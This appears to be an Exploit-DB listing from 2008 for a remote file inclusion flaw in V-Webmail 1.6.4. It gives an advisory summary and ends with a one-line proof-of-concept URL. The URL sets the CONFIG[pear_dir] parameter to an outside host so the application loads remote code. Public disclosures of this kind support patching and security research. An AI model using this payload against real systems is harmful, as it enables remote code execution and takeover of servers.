V-Webmail 1.6.4 - '/includes/pear/XML/parser.php?CONFIG[pear_dir]' Remote File Inclusion

EDB-ID:

32026


Author:

CraCkEr

Type:

webapps


Platform:

PHP

Date:

2008-07-10


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

source: https://www.securityfocus.com/bid/30162/info
  
V-webmail is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
  
Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
  
V-webmail 1.6.4 is vulnerable; other versions may also be affected.

http://www.example.com/path/includes/pear/XML/Parser.php?CONFIG[pear_dir]=http://www.example2.com